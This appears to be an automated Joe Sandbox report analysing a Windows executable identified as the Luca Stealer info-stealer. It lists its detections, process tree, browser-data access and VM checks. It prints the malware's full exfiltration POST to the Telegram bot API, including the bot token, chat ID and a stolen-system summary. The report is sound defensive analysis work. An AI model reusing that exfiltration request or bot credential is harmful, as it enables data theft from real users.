Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
765iYbgWn9.exe

Overview

General Information

Sample name:765iYbgWn9.exe
renamed because original name is a hash value
Original sample name:0534ab10184891cd61d262bfd79b7b4c.exe
Analysis ID:1483815
MD5:0534ab10184891cd61d262bfd79b7b4c
SHA1:a13d37959a92bc37f4d3c42eb53d77cc760f448a
SHA256:191272e200345dcb0a7a8c8c975a8b07847f07b9d9f0c3af472fdb88092aee0b
Tags:64exetrojan
Infos:

Detection

Luca Stealer
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Luca Stealer
AI detected suspicious sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

Process Tree

  • System is w10x64
  • 765iYbgWn9.exe (PID: 7552 cmdline: "C:\Users\user\Desktop\765iYbgWn9.exe" MD5: 0534AB10184891CD61D262BFD79B7B4C)
    • powershell.exe (PID: 8056 cmdline: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
765iYbgWn9.exeJoeSecurity_LucaStealerYara detected Luca StealerJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_LucaStealerYara detected Luca StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: 765iYbgWn9.exe PID: 7552JoeSecurity_LucaStealerYara detected Luca StealerJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.0.765iYbgWn9.exe.7ff62f040000.0.unpackJoeSecurity_LucaStealerYara detected Luca StealerJoe Security

          Sigma Signatures

          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\765iYbgWn9.exe", ParentImage: C:\Users\user\Desktop\765iYbgWn9.exe, ParentProcessId: 7552, ParentProcessName: 765iYbgWn9.exe, ProcessCommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", ProcessId: 8056, ProcessName: powershell.exe

          Snort Signatures

          No Snort rule has matched

          Suricata Signatures

          Timestamp:2024-07-29T07:38:58.167052+0200
          SID:2039009
          Source Port:443
          Destination Port:60284
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-07-29T07:38:17.826882+0200
          SID:2022930
          Source Port:443
          Destination Port:49706
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-07-29T07:38:45.004637+0200
          SID:2022930
          Source Port:443
          Destination Port:60283
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: 765iYbgWn9.exeReversingLabs: Detection: 50%
          Source: 765iYbgWn9.exeVirustotal: Detection: 32%Perma Link
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:60284 version: TLS 1.2
          Source: 765iYbgWn9.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: rust_stealer_xss.pdb source: 765iYbgWn9.exe
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\Jump to behavior

          Networking

          barindex
          Uses the Telegram API (likely for C&C communication)
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: POST /bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendDocument?chat_id=5795480469&caption=%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.33%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-04:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20Y7SLS%20(1280,%201024)%0AHWID:%205205123305035030%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\765iYbgWn9.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2030%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Cookies:%20&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=35ae211d349cb1f4-a77385f923c3c626-0e46c70059d2a17c-d7d54ebd8b6b92ddcontent-length: 938035accept: */*host: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
          Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
          Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownDNS query: name: ipwho.is
          Source: unknownDNS query: name: ipwho.is
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
          Source: global trafficHTTP traffic detected: GET /?output=json HTTP/1.1accept: */*host: ipwho.is
          Source: global trafficDNS traffic detected: DNS query: ipwho.is
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: unknownHTTP traffic detected: POST /bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendDocument?chat_id=5795480469&caption=%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.33%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-04:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20Y7SLS%20(1280,%201024)%0AHWID:%205205123305035030%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\765iYbgWn9.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2030%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Cookies:%20&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=35ae211d349cb1f4-a77385f923c3c626-0e46c70059d2a17c-d7d54ebd8b6b92ddcontent-length: 938035accept: */*host: api.telegram.org
          Source: 765iYbgWn9.exeString found in binary or memory: http://ns.adobe.
          Source: 765iYbgWn9.exeString found in binary or memory: http://www.w3.or
          Source: 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: 765iYbgWn9.exe, 00000000.00000003.1963664259.00000270FAD21000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.1963812730.00000270FCA20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendDocument?chat_id=5795
          Source: 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: 765iYbgWn9.exeString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-supportC:
          Source: 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: 765iYbgWn9.exe, 00000000.00000003.1886356574.00000270FCA98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownNetwork traffic detected: HTTP traffic on port 60284 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60284
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:60284 version: TLS 1.2
          Source: 765iYbgWn9.exeBinary string: Afdfd\Device\Afd\Mio
          Source: 765iYbgWn9.exeBinary string: Failed to open \Device\Afd\Mio:
          Source: classification engineClassification label: mal72.troj.spyw.winEXE@4/15@3/2
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\key4.dbJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
          Source: C:\Users\user\Desktop\765iYbgWn9.exeFile created: C:\Users\user\AppData\Local\Temp\s5iFQXt2cruvlXgj7GPP58bkLI6N1f\Jump to behavior
          Source: 765iYbgWn9.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\765iYbgWn9.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Users\user\Desktop\765iYbgWn9.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: 765iYbgWn9.exe, 00000000.00000000.1402767583.00007FF62F437000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
          Source: 765iYbgWn9.exe, 00000000.00000000.1402767583.00007FF62F437000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
          Source: 765iYbgWn9.exe, 00000000.00000000.1402767583.00007FF62F437000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
          Source: 765iYbgWn9.exe, 00000000.00000000.1402767583.00007FF62F437000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
          Source: 765iYbgWn9.exe, 00000000.00000000.1402767583.00007FF62F437000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
          Source: 765iYbgWn9.exe, 00000000.00000000.1402767583.00007FF62F437000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
          Source: 765iYbgWn9.exe, 00000000.00000003.1884980962.00000270FACDA000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.1885182766.00000270FACDA000.00000004.00000020.00020000.00000000.sdmp, Login Data.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: 765iYbgWn9.exe, 00000000.00000000.1402767583.00007FF62F437000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
          Source: 765iYbgWn9.exeReversingLabs: Detection: 50%
          Source: 765iYbgWn9.exeVirustotal: Detection: 32%
          Source: unknownProcess created: C:\Users\user\Desktop\765iYbgWn9.exe "C:\Users\user\Desktop\765iYbgWn9.exe"
          Source: C:\Users\user\Desktop\765iYbgWn9.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\765iYbgWn9.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"Jump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeSection loaded: cryptnet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\765iYbgWn9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: 765iYbgWn9.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: 765iYbgWn9.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: 765iYbgWn9.exeStatic file information: File size 5438976 > 1048576
          Source: 765iYbgWn9.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3a4a00
          Source: 765iYbgWn9.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x168200
          Source: 765iYbgWn9.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: 765iYbgWn9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: rust_stealer_xss.pdb source: 765iYbgWn9.exe
          Source: C:\Users\user\Desktop\765iYbgWn9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
